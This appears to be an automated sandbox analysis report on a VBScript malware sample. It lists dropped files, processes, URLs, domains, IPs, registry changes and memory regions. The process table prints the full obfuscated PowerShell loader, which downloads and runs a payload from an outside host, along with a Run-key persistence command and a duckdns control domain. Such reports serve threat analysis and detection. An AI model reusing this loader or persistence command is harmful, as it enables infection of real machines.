Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
temp.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\Log.tmp
|
Generic INItialization configuration [WIN]
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4kph4tpr.vzf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4tajbn5b.0xw.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mevzgpjd.ne3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qhou0hz4.b3w.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Akenbold.udf
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\temp.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Autarkically189 = 1;$Indgangssignaletnstruktionsbger='Sub';$Indgangssignaletnstruktionsbger+='strin';$Indgangssignaletnstruktionsbger+='g';Function
Quadmeter($Dopingsigtet){$Dumpeprocenter=$Dopingsigtet.Length-$Autarkically189;For($Indgangssignalet=5;$Indgangssignalet -lt
$Dumpeprocenter;$Indgangssignalet+=6){$Forlys+=$Dopingsigtet.$Indgangssignaletnstruktionsbger.Invoke( $Indgangssignalet, $Autarkically189);}$Forlys;}function
Flaprer($Caissoned){& ($Sopites) ($Caissoned);}$Generalisternes=Quadmeter 'PylorM edto ,ildzI raeiMa oel Uerhl Falsahejka/Timia5
L ft.Gar,e0Andro K,rre(M.ckeW,evaaiSvinenAnti.dLandgo FluewSkalksgarnn OraclNJaponTYoudi Gr,ni1Codd 0Unde,.S ick0Tilkr;Event
BistW joiniContrn .chw6 Hrin4S,vsu;Hapte Seg exRende6Gaine4Prebl;J.mps Pu prBoligv Fort: Edu.1 Hete2 cure1Vomme.Mona.0A.pel)Omber
Vra.tG Trafe Her.cG,laxkMonisoHensl/Unsea2Foeta0Dekup1Wares0 udpl0Redes1Bepow0Muted1slapp .raktFPlaitiFuskerKentoe Ba,rf Tra,oUtrovxvedes/
Anda1Utilf2 Damp1 Trid.Bus,i0Ilixa ';$Lifeblood=Quadmeter 'FolkeUCroo s merceBestyrSulmu-KlimaAGul bgAnecdeSlut,nProtot luma
';$Postfrontal=Quadmeter 'Ca dihVaabetD llat.unktpSf.rbs Ndve:Hjlan/Broo / rickrCatkiacors,nOverlcT,enehPatruoT,ldebSupero
Pol.sFrembcDickeaLecitr Sv.ndLatheiStyktnFilmo.Sweepcshaveo S pemCapit.PollybKulbrrSvend/Me.alcSk,ttsNasc /Hupa.RUnex rEnangk
refonTas eo Jugeg HanelEva,geIgnitrP ntenF,rdreForst.A gotaKinetsAkkordBrug, ';$Uninnocuous=Quadmeter 'Kundg>Provi ';$Sopites=Quadmeter
',ablei RealePrespxTe,ef ';$Sorteringsmulighederne='Exclusion';$Opkaldsprisen = Quadmeter 'Se.areNoteacoprejhJovasoLeann Bem
r%BiofeaD strp Stutp KviedDin oa Kurit Unscaman,e% Kono\OluffATraf k AareeUndernIsopyb ,kikocererlUnderdTindi.MissiuS,ilnd
,nntf Enta pos r&Plasm& Proc M,rateO erpcProtohUnmeeod zzi Hres.tHavmi ';Flaprer (Quadmeter ' Blus$Urgeng GerulFryseo Lempb
FrdiaLs lulAn gg:Sta,sMBras,aScombrDoedsi JuleaYndlin acroe Udso=Drukk(Kolp,cWap,emTomatdTr.ll Unris/Ch ckc Exto Visib$Un
erOmag,rpLinjekEntraaOverfl ,hardFulnes rtepCodesrRe rniBeloesTerraeXylopnBr.es)Sikke ');Flaprer (Quadmeter 'Beund$Ophiug
BaptlFissio O dlbUdfaka.ordblWangl: EmbiSVetkotStnkso.rimeoPellenmediz= Rver$ MetoPProteo Parks EmantIoannfunsierC.nfioRo
ernSkotjtBistiaKlimalOrico. Bisis nhidp Opbel frigi StiltScamb( tale$InsecUAlternKnapbiUltran urunnRefrao e accRd.hau InaloGoo,euSagitsArbut)Sickl
');$Postfrontal=$Stoon[0];$prespakket= (Quadmeter 'Blegs$ WoengBicyclNarkooNon.ubVagotaFald.lsingu:V.jrsH G gguMillicUnmedkExtrisArtictEcchae
Bul.r Prece predrOuthu=LoneyNTo.sieOrthowPerfe-PigeoOAndalbSu.jejDrasteFrigrcOracutFntrr Bss.SProctyDeckhsWhimbtCetaneEmbramLe,be.AcapnNKubeueBr
kvtPost . GeneWNondeeSu,nobHelheC H melplaniiKrisee Xylon rist');$prespakket+=$Mariane[1];Flaprer ($prespakket);Flaprer (Quadmeter
' vato$ ShelHPierlu emmecDuks kKbsprs G ostRaf ie ,erirSan.eeMe osrPtose. SlatH StriehundraForgadSpe.keTubulr SknhsSkift[Os.eo$KonceLForbliMi.spf
DieseKod.obLder.l ListoUnderoGare.dVou h]Pupil=Indyn$ CedeGRareteAnticn robeKod fr MaunaNonful Wonki.getisMediotPrincepsychrFors.nWebbeeoctansBgetr
');$Sedimentology=Quadmeter 'Forsg$CholoHFollouMo.incMichakCrudss bucctJevgeePs,udrUnde eSveskrP.ese.OyezeDProtaoCo bowDisfanHjernlFremfoBeskmaorgand
BuslFsprayihelbrlVentreSkamf(Natur$enk sPOssifoSydkos Nonst FrihfJusterTakvioE,iksn RichtFolkeafilmil Un m,ele.t$SchweSMismoeKemikn.ftrasDiagniSub
to TailnZa cl)Repro ';$Sension=$Mariane[0];Flaprer (Quadmeter 'F sty$cantlg ulteliv rao NonpbPr.reavandslE imi: .easI O,ygbBronzoSkee.eBleganMorfid
BaadeHaptosHtte.=Hippo(taljeT arteFaldlsG bbetGl.sp-GgetsPVildta Gri,tStoddhoutpu udfol$ KodeS H,nseIngvenRundtsho.nwiAllowoB
ogrnG,atb)Outsi ');while (!$Iboendes) {Flaprer (Quadmeter 'Diale$ ,notgSimull Bjero lagebS,iklaMacrolMiste:Fryt rtorpeeTalefw
L llaEmbrokMycetiF.rlanKh ttgOuttr= Efte$,elgetarti,rSandiuCirc eFlabe ') ;Flaprer $Sedimentology;Flaprer (Quadmeter 'I.bjeSluthetBejaeaGleb,rHou
et Gest- Nav SVinealAni.oeBriefeTroldpF.jia Rollo4Viru, ');Flaprer (Quadmeter 'Tryll$ infigTrafilTftinoAmpulb LudlaCheatlConso:BrndeI
In ubThatconatioeConfin GalidFinene TerrsSkabs=Indle(SumplTPolite BeausClitutAnato- eakPHalluaFlammtS,linhUneli Pipet$ ConiSI
dolePuppenSa,icscynomiFatt oPensinTande)Charl ') ;Flaprer (Quadmeter ' Nond$StilegSuccelUp taoKraftbImmeaaKontrlAf ci:Su,taNNul.teUnderw,krivsModstp
MetaaKont,pTn,haeBegrbrAmalgw Sty,o uncomTrisoaTractnFiske=Sabao$ SivegProtalFrancoEsp,rbSuppeaKaliblYderv:Dok,eBopskrip,wdol
PolslSonateFodredHdersgLseh.aKar,olSh,inlFileteBef lrKiliaiEn.ase He.srSu,penSt afe.esvr+ nfo+U,kke%Bordi$ MistS AfhatBogs,oHe
taoBrnefn sams.Snipeclo,aloU deruartisnMonert Ste, ') ;$Postfrontal=$Stoon[$Newspaperwoman];}$Bortfaldets=331483;$Poultice=30104;Flaprer
(Quadmeter 'Skra,$Jo,dfgSko,al,ovino P,ptbskaana heatlAll.n:UdbetTublufr.fspioBajadvfips,a UnretMinisoFiltrr SarieAntip Shri
= skbn BietGTr gaeCo,sutVitam-TelocC S psoNephrn Dil.t FakueRaadynK oketBric Disso$ arinSAmazee ircn ,ndesKu,suiLatk,o
f,ldnSnder ');Flaprer (Quadmeter 'De,ar$MetapgAlloclBethooInadvbHillbaTwic,lFilip:PrismHMedgaablegvzBitmaaI.idar.nebodGuttoiSvanesPeutieParoqspot.t
Afnat=Pl ty Feti[,amilSNanosyAriids NonetSma.semucovmDisda. BeviCRetteo skr ncentrv unadeRenslrImplat Radi]Aarli:fdeva: AchrF.eogrrAt
mioUdspemBygniBFusenaSigtesDybh.eStave6A,nes4AuspiS TjentOmvejrTernii Lin.nSkrubgeuryc(Kneb $KnaplTKra arS,xmio BestvParacaNumistIngefo
nonirCent,eSisle) Homo ');Flaprer (Quadmeter 'Hoved$plukngE.ikelbrawnoAtlanb Ud.ia Trk.lLilia: ,oelSBi,alasim ldF,bridko.mue
SkomlNetvrmstodgaBu lsgSchzjeFolkerG dssa KinnrGripybGag reSadisj DolldBesteeRkenlsStaff Foder=Airti super[StoltSSt.dgy CapesPostutHovedeAvogamDemag.Klun,TMononePaymax
apentmaras. HedeEBrndsnNeurocVo,alo onomdEvighiFod onResolgWhitl]No.pr:batik:JechoAdetalSVirkeC Sub,IFrienISnadr. VigtG MesoeFili.tOtopaSFedtit.obberSalzfiRewaknG,nopgAlarm(L,ane$PopulHDrmmeaCentrzAfd
laPhenor JuandEl rii Flaksbyta eMakkes .sdi)Numme ');Flaprer (Quadmeter 'hem.a$ModergApplalMozaroMisfibEg.nvaFertilOver :Vagtls
undeoTet.acDi,ori Hyp aIn,uslb,irui UncosSymmevUr nem Hjlpr.naud= Unva$UnturSSpr.naBeskudYestod FebreFotoelOutram SelvaUnpasgHoldfeKantar
BornaAdiporFusepbAnidreGanerjSkilldEjerteEntossUncov.WarslsTilveuKastabBurresStewatU,gagrOrcaniLicounEpexegHybe (Circu$SonniB
SammoNonenr BohetProb.f Tilda .erolSammed L.reem.nudtTanglsOpkal,Untru$PamflPIdioto De xuUnharlSweeptHobbyiSteppcEf.ereS.ien)Siree
');Flaprer $socialisvmr;"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Akenbold.udf && echo t"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Autarkically189 = 1;$Indgangssignaletnstruktionsbger='Sub';$Indgangssignaletnstruktionsbger+='strin';$Indgangssignaletnstruktionsbger+='g';Function
Quadmeter($Dopingsigtet){$Dumpeprocenter=$Dopingsigtet.Length-$Autarkically189;For($Indgangssignalet=5;$Indgangssignalet -lt
$Dumpeprocenter;$Indgangssignalet+=6){$Forlys+=$Dopingsigtet.$Indgangssignaletnstruktionsbger.Invoke( $Indgangssignalet, $Autarkically189);}$Forlys;}function
Flaprer($Caissoned){& ($Sopites) ($Caissoned);}$Generalisternes=Quadmeter 'PylorM edto ,ildzI raeiMa oel Uerhl Falsahejka/Timia5
L ft.Gar,e0Andro K,rre(M.ckeW,evaaiSvinenAnti.dLandgo FluewSkalksgarnn OraclNJaponTYoudi Gr,ni1Codd 0Unde,.S ick0Tilkr;Event
BistW joiniContrn .chw6 Hrin4S,vsu;Hapte Seg exRende6Gaine4Prebl;J.mps Pu prBoligv Fort: Edu.1 Hete2 cure1Vomme.Mona.0A.pel)Omber
Vra.tG Trafe Her.cG,laxkMonisoHensl/Unsea2Foeta0Dekup1Wares0 udpl0Redes1Bepow0Muted1slapp .raktFPlaitiFuskerKentoe Ba,rf Tra,oUtrovxvedes/
Anda1Utilf2 Damp1 Trid.Bus,i0Ilixa ';$Lifeblood=Quadmeter 'FolkeUCroo s merceBestyrSulmu-KlimaAGul bgAnecdeSlut,nProtot luma
';$Postfrontal=Quadmeter 'Ca dihVaabetD llat.unktpSf.rbs Ndve:Hjlan/Broo / rickrCatkiacors,nOverlcT,enehPatruoT,ldebSupero
Pol.sFrembcDickeaLecitr Sv.ndLatheiStyktnFilmo.Sweepcshaveo S pemCapit.PollybKulbrrSvend/Me.alcSk,ttsNasc /Hupa.RUnex rEnangk
refonTas eo Jugeg HanelEva,geIgnitrP ntenF,rdreForst.A gotaKinetsAkkordBrug, ';$Uninnocuous=Quadmeter 'Kundg>Provi ';$Sopites=Quadmeter
',ablei RealePrespxTe,ef ';$Sorteringsmulighederne='Exclusion';$Opkaldsprisen = Quadmeter 'Se.areNoteacoprejhJovasoLeann Bem
r%BiofeaD strp Stutp KviedDin oa Kurit Unscaman,e% Kono\OluffATraf k AareeUndernIsopyb ,kikocererlUnderdTindi.MissiuS,ilnd
,nntf Enta pos r&Plasm& Proc M,rateO erpcProtohUnmeeod zzi Hres.tHavmi ';Flaprer (Quadmeter ' Blus$Urgeng GerulFryseo Lempb
FrdiaLs lulAn gg:Sta,sMBras,aScombrDoedsi JuleaYndlin acroe Udso=Drukk(Kolp,cWap,emTomatdTr.ll Unris/Ch ckc Exto Visib$Un
erOmag,rpLinjekEntraaOverfl ,hardFulnes rtepCodesrRe rniBeloesTerraeXylopnBr.es)Sikke ');Flaprer (Quadmeter 'Beund$Ophiug
BaptlFissio O dlbUdfaka.ordblWangl: EmbiSVetkotStnkso.rimeoPellenmediz= Rver$ MetoPProteo Parks EmantIoannfunsierC.nfioRo
ernSkotjtBistiaKlimalOrico. Bisis nhidp Opbel frigi StiltScamb( tale$InsecUAlternKnapbiUltran urunnRefrao e accRd.hau InaloGoo,euSagitsArbut)Sickl
');$Postfrontal=$Stoon[0];$prespakket= (Quadmeter 'Blegs$ WoengBicyclNarkooNon.ubVagotaFald.lsingu:V.jrsH G gguMillicUnmedkExtrisArtictEcchae
Bul.r Prece predrOuthu=LoneyNTo.sieOrthowPerfe-PigeoOAndalbSu.jejDrasteFrigrcOracutFntrr Bss.SProctyDeckhsWhimbtCetaneEmbramLe,be.AcapnNKubeueBr
kvtPost . GeneWNondeeSu,nobHelheC H melplaniiKrisee Xylon rist');$prespakket+=$Mariane[1];Flaprer ($prespakket);Flaprer (Quadmeter
' vato$ ShelHPierlu emmecDuks kKbsprs G ostRaf ie ,erirSan.eeMe osrPtose. SlatH StriehundraForgadSpe.keTubulr SknhsSkift[Os.eo$KonceLForbliMi.spf
DieseKod.obLder.l ListoUnderoGare.dVou h]Pupil=Indyn$ CedeGRareteAnticn robeKod fr MaunaNonful Wonki.getisMediotPrincepsychrFors.nWebbeeoctansBgetr
');$Sedimentology=Quadmeter 'Forsg$CholoHFollouMo.incMichakCrudss bucctJevgeePs,udrUnde eSveskrP.ese.OyezeDProtaoCo bowDisfanHjernlFremfoBeskmaorgand
BuslFsprayihelbrlVentreSkamf(Natur$enk sPOssifoSydkos Nonst FrihfJusterTakvioE,iksn RichtFolkeafilmil Un m,ele.t$SchweSMismoeKemikn.ftrasDiagniSub
to TailnZa cl)Repro ';$Sension=$Mariane[0];Flaprer (Quadmeter 'F sty$cantlg ulteliv rao NonpbPr.reavandslE imi: .easI O,ygbBronzoSkee.eBleganMorfid
BaadeHaptosHtte.=Hippo(taljeT arteFaldlsG bbetGl.sp-GgetsPVildta Gri,tStoddhoutpu udfol$ KodeS H,nseIngvenRundtsho.nwiAllowoB
ogrnG,atb)Outsi ');while (!$Iboendes) {Flaprer (Quadmeter 'Diale$ ,notgSimull Bjero lagebS,iklaMacrolMiste:Fryt rtorpeeTalefw
L llaEmbrokMycetiF.rlanKh ttgOuttr= Efte$,elgetarti,rSandiuCirc eFlabe ') ;Flaprer $Sedimentology;Flaprer (Quadmeter 'I.bjeSluthetBejaeaGleb,rHou
et Gest- Nav SVinealAni.oeBriefeTroldpF.jia Rollo4Viru, ');Flaprer (Quadmeter 'Tryll$ infigTrafilTftinoAmpulb LudlaCheatlConso:BrndeI
In ubThatconatioeConfin GalidFinene TerrsSkabs=Indle(SumplTPolite BeausClitutAnato- eakPHalluaFlammtS,linhUneli Pipet$ ConiSI
dolePuppenSa,icscynomiFatt oPensinTande)Charl ') ;Flaprer (Quadmeter ' Nond$StilegSuccelUp taoKraftbImmeaaKontrlAf ci:Su,taNNul.teUnderw,krivsModstp
MetaaKont,pTn,haeBegrbrAmalgw Sty,o uncomTrisoaTractnFiske=Sabao$ SivegProtalFrancoEsp,rbSuppeaKaliblYderv:Dok,eBopskrip,wdol
PolslSonateFodredHdersgLseh.aKar,olSh,inlFileteBef lrKiliaiEn.ase He.srSu,penSt afe.esvr+ nfo+U,kke%Bordi$ MistS AfhatBogs,oHe
taoBrnefn sams.Snipeclo,aloU deruartisnMonert Ste, ') ;$Postfrontal=$Stoon[$Newspaperwoman];}$Bortfaldets=331483;$Poultice=30104;Flaprer
(Quadmeter 'Skra,$Jo,dfgSko,al,ovino P,ptbskaana heatlAll.n:UdbetTublufr.fspioBajadvfips,a UnretMinisoFiltrr SarieAntip Shri
= skbn BietGTr gaeCo,sutVitam-TelocC S psoNephrn Dil.t FakueRaadynK oketBric Disso$ arinSAmazee ircn ,ndesKu,suiLatk,o
f,ldnSnder ');Flaprer (Quadmeter 'De,ar$MetapgAlloclBethooInadvbHillbaTwic,lFilip:PrismHMedgaablegvzBitmaaI.idar.nebodGuttoiSvanesPeutieParoqspot.t
Afnat=Pl ty Feti[,amilSNanosyAriids NonetSma.semucovmDisda. BeviCRetteo skr ncentrv unadeRenslrImplat Radi]Aarli:fdeva: AchrF.eogrrAt
mioUdspemBygniBFusenaSigtesDybh.eStave6A,nes4AuspiS TjentOmvejrTernii Lin.nSkrubgeuryc(Kneb $KnaplTKra arS,xmio BestvParacaNumistIngefo
nonirCent,eSisle) Homo ');Flaprer (Quadmeter 'Hoved$plukngE.ikelbrawnoAtlanb Ud.ia Trk.lLilia: ,oelSBi,alasim ldF,bridko.mue
SkomlNetvrmstodgaBu lsgSchzjeFolkerG dssa KinnrGripybGag reSadisj DolldBesteeRkenlsStaff Foder=Airti super[StoltSSt.dgy CapesPostutHovedeAvogamDemag.Klun,TMononePaymax
apentmaras. HedeEBrndsnNeurocVo,alo onomdEvighiFod onResolgWhitl]No.pr:batik:JechoAdetalSVirkeC Sub,IFrienISnadr. VigtG MesoeFili.tOtopaSFedtit.obberSalzfiRewaknG,nopgAlarm(L,ane$PopulHDrmmeaCentrzAfd
laPhenor JuandEl rii Flaksbyta eMakkes .sdi)Numme ');Flaprer (Quadmeter 'hem.a$ModergApplalMozaroMisfibEg.nvaFertilOver :Vagtls
undeoTet.acDi,ori Hyp aIn,uslb,irui UncosSymmevUr nem Hjlpr.naud= Unva$UnturSSpr.naBeskudYestod FebreFotoelOutram SelvaUnpasgHoldfeKantar
BornaAdiporFusepbAnidreGanerjSkilldEjerteEntossUncov.WarslsTilveuKastabBurresStewatU,gagrOrcaniLicounEpexegHybe (Circu$SonniB
SammoNonenr BohetProb.f Tilda .erolSammed L.reem.nudtTanglsOpkal,Untru$PamflPIdioto De xuUnharlSweeptHobbyiSteppcEf.ereS.ien)Siree
');Flaprer $socialisvmr;"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Akenbold.udf && echo t"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ
/d "%Forringens% -w 1 $kettledrummer=(Get-ItemProperty -Path 'HKCU:\Unsliding\').Warmnesses;%Forringens% ($kettledrummer)"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Forringens% -w 1 $kettledrummer=(Get-ItemProperty
-Path 'HKCU:\Unsliding\').Warmnesses;%Forringens% ($kettledrummer)"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
xw9402may.duckdns.org
|
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://ranchoboscardin.com.br/
|
unknown
|
||
|
https://ranchoboscardin.com.br/cs/Rrknoglerne.asdXR
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://ranchoboscardin.com.br/cs/yGxZBU
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://ranchoboscardin.com.br/cs/Rrknoglerne.asd
|
67.23.238.5
|
||
|
https://go.micro
|
unknown
|
||
|
https://ranchoboscardin.com.br/cs/Rrknoglerne.asdP
|
unknown
|
||
|
https://ranchoboscardin.com.br/cs/yGxZBUGU144.bin
|
67.23.238.5
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://ranchoboscardin.com.br
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://ranchoboscardin.com.br
|
unknown
|
||
|
http://www.microsoft.C
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://ranchoboscardin.com.br/cs/yGxZBUGU144.bin?
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://ranchoboscardin.com.br/cs/yGxZBUGU144.binC
|
unknown
|
There are 14 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
xw9402may.duckdns.org
|
12.221.146.138
|
|
|
|
ranchoboscardin.com.br
|
67.23.238.5
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
12.221.146.138
|
xw9402may.duckdns.org
|
United States
|
|
|
|
67.23.238.5
|
ranchoboscardin.com.br
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\Unsliding
|
Warmnesses
|
||
|
HKEY_CURRENT_USER\Environment
|
Forringens
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Startup key
|
There are 7 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
24B64330000
|
trusted library allocation
|
page read and write
|
|
|
|
8490000
|
direct allocation
|
page execute and read and write
|
|
|
|
A310000
|
direct allocation
|
page execute and read and write
|
|
|
|
56D3000
|
trusted library allocation
|
page read and write
|
|
|
|
23A41000
|
trusted library allocation
|
page read and write
|
|
|
|
79B8000
|
heap
|
page read and write
|
||
|
25CCD000
|
trusted library allocation
|
page read and write
|
||
|
24B528F0000
|
trusted library allocation
|
page read and write
|
||
|
1FA30B94000
|
heap
|
page read and write
|
||
|
7FFAAC3E0000
|
trusted library allocation
|
page read and write
|
||
|
2EBF000
|
stack
|
page read and write
|
||
|
2B4D000
|
stack
|
page read and write
|
||
|
7FFAAC3E3000
|
trusted library allocation
|
page execute and read and write
|
||
|
79D7000
|
heap
|
page read and write
|
||
|
7FFB1E3C0000
|
unkown
|
page read and write
|
||
|
25D20000
|
trusted library allocation
|
page read and write
|
||
|
2B18000
|
heap
|
page read and write
|
||
|
24B645AA000
|
trusted library allocation
|
page read and write
|
||
|
6BB0000
|
direct allocation
|
page read and write
|
||
|
7FFB1E3C2000
|
unkown
|
page readonly
|
||
|
23830000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E3B6000
|
unkown
|
page readonly
|
||
|
2FC7000
|
trusted library allocation
|
page execute and read and write
|
||
|
25D20000
|
trusted library allocation
|
page read and write
|
||
|
23868000
|
trusted library allocation
|
page read and write
|
||
|
25A66000
|
heap
|
page read and write
|
||
|
2D60000
|
trusted library allocation
|
page execute and read and write
|
||
|
7BCE000
|
stack
|
page read and write
|
||
|
694F000
|
stack
|
page read and write
|
||
|
24B6C720000
|
heap
|
page read and write
|
||
|
24B642E1000
|
trusted library allocation
|
page read and write
|
||
|
25DB1000
|
heap
|
page read and write
|
||
|
7A47000
|
heap
|
page read and write
|
||
|
45A3000
|
trusted library allocation
|
page read and write
|
||
|
8230000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
2358C000
|
stack
|
page read and write
|
||
|
C69BDFE000
|
stack
|
page read and write
|
||
|
24B53FA0000
|
heap
|
page read and write
|
||
|
1FA32970000
|
heap
|
page read and write
|
||
|
1D4961B0000
|
heap
|
page read and write
|
||
|
7410000
|
trusted library allocation
|
page read and write
|
||
|
1FA30BF2000
|
heap
|
page read and write
|
||
|
842E000
|
stack
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
25A5C000
|
heap
|
page read and write
|
||
|
4530000
|
remote allocation
|
page execute and read and write
|
||
|
7C90000
|
heap
|
page read and write
|
||
|
24B526AC000
|
heap
|
page read and write
|
||
|
25D80000
|
trusted library allocation
|
page read and write
|
||
|
CC6F4FD000
|
stack
|
page read and write
|
||
|
24B54735000
|
trusted library allocation
|
page read and write
|
||
|
27F0000
|
trusted library section
|
page read and write
|
||
|
7AB0000
|
heap
|
page read and write
|
||
|
2EE0000
|
heap
|
page read and write
|
||
|
25A5C000
|
heap
|
page read and write
|
||
|
24B526B2000
|
heap
|
page read and write
|
||
|
1FA30B42000
|
heap
|
page read and write
|
||
|
74DB000
|
stack
|
page read and write
|
||
|
1FA30BE4000
|
heap
|
page read and write
|
||
|
7C4D000
|
stack
|
page read and write
|
||
|
2C50000
|
trusted library allocation
|
page read and write
|
||
|
25A4E000
|
heap
|
page read and write
|
||
|
23844000
|
trusted library allocation
|
page read and write
|
||
|
25CF1000
|
trusted library allocation
|
page read and write
|
||
|
1FA32884000
|
heap
|
page read and write
|
||
|
7FFAAC610000
|
trusted library allocation
|
page read and write
|
||
|
6EBF1000
|
unkown
|
page execute read
|
||
|
25CBE000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
699000
|
heap
|
page read and write
|
||
|
7036000
|
heap
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
23820000
|
trusted library allocation
|
page read and write
|
||
|
803F000
|
heap
|
page read and write
|
||
|
24B541F0000
|
heap
|
page execute and read and write
|
||
|
2E3E000
|
stack
|
page read and write
|
||
|
24B525A0000
|
heap
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
25A53000
|
heap
|
page read and write
|
||
|
8E50000
|
direct allocation
|
page execute and read and write
|
||
|
2F9D000
|
trusted library allocation
|
page execute and read and write
|
||
|
279D000
|
stack
|
page read and write
|
||
|
23A20000
|
trusted library allocation
|
page read and write
|
||
|
24B54AC0000
|
trusted library allocation
|
page read and write
|
||
|
2E7F000
|
stack
|
page read and write
|
||
|
1FA328BC000
|
heap
|
page read and write
|
||
|
6B90000
|
direct allocation
|
page read and write
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
1FA3288D000
|
heap
|
page read and write
|
||
|
261CE000
|
stack
|
page read and write
|
||
|
7FFB1E3A0000
|
unkown
|
page readonly
|
||
|
25CF0000
|
trusted library allocation
|
page read and write
|
||
|
24B52685000
|
heap
|
page read and write
|
||
|
24B56196000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E3A0000
|
unkown
|
page readonly
|
||
|
25A99000
|
heap
|
page read and write
|
||
|
7F0D000
|
stack
|
page read and write
|
